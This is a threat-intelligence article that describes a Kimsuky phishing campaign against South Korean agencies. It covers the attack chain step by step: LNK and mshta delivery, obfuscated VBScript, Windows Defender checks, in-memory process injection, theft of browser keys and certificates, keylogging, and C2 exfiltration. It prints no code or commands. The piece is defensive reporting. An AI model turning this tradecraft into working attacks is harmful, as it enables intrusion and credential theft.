Sophisticated Kimsuky Campaign: New Malware Bypasses Windows Defender
The Kimsuky group has once again found itself at the center of attention following a campaign that deftly combined social engineering tactics with sophisticated techniques for bypassing Windows security mechanisms. Their targets included South Korean government agencies, defense contractors, and research institutions, whose employees received emails containing ZIP archives disguised as innocuous documents but in fact harboring malicious LNK shortcuts.
Executing the LNK file triggered the launch of mshta.exe, which loaded a remote HTML application hosted on a CDN. Hidden within this application was an obfuscated VBScript, intricately constructed using string variables and transformed via CLng and Chr functions—making code analysis nearly impossible for conventional security tools. Simultaneously, a decoy PDF was launched to distract the user, styled to resemble an official government notice regarding infractions or penalties.
In parallel, the malicious script probed the system for Windows Defender activity, invoking a cmd command to determine the status of the WinDefend service. If Defender was active, the malware fetched an archive containing Base64-encoded PowerShell scripts tailored for data exfiltration and keylogging. To avoid redundant execution, a temporary file was created in the system, uniquely named using a UUID. These scripts also performed virtualization checks to detect whether the host environment was running on VMware, Microsoft Hyper-V, or VirtualBox, and established persistence by writing a registry key masquerading as WindowsSecurityCheck.
If Windows Defender was found to be disabled, the infection chain advanced to a more aggressive phase: an alternative HTA file embedded with Base64-encoded payloads was downloaded. These payloads were injected directly into memory—bypassing disk writes and avoiding detection by signature-based scanners. Decryption of the payloads was handled via the RC4 algorithm, with execution carried out using VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread—techniques that enabled code injection into legitimate system processes while evading traditional security checks.
Particular emphasis was placed on credential theft: the malware specifically sought the app_bound_encrypted_key stored in Chrome, Edge, and Brave browsers—an essential component for decrypting stored passwords and cookies. In addition, the malware compressed certificate directories (NPKI and GPKI), exfiltrated recently accessed documents, gathered browser extension data, and systematically searched for files with sensitive extensions, including those related to cryptocurrency.
All exfiltrated data was stored in a uniquely named folder within %TEMP%, archived as init.zip, then renamed to init.dat, and exfiltrated to command-and-control servers via segmented POST requests, camouflaged to resemble ordinary web traffic. Keylogging was implemented using native Windows APIs to intercept keystrokes, clipboard activity, and active window titles, with logs saved to k.log and periodically transmitted to the attacker.
Throughout the entire attack lifecycle, the malware maintained persistent communication with its C2 infrastructure, polling every ten minutes to execute instructions for uploading, downloading, and running remote PowerShell commands—enabling dynamic updates and real-time behavioral adaptation.
The distinct fingerprints—Korean-themed decoys, PowerShell exploitation, and the tactical blend of social engineering with native system tools—strongly align with past Kimsuky campaigns, as corroborated by multiple public threat intelligence reports in 2025. This attack sequence underscores the group’s sophistication in crafting threats that evade detection by leveraging legitimate system components.
To mitigate such threats, experts recommend implementing behavioral monitoring, enhanced auditing of PowerShell activity, and centralized security platforms capable of identifying anomalies across enterprise environments.
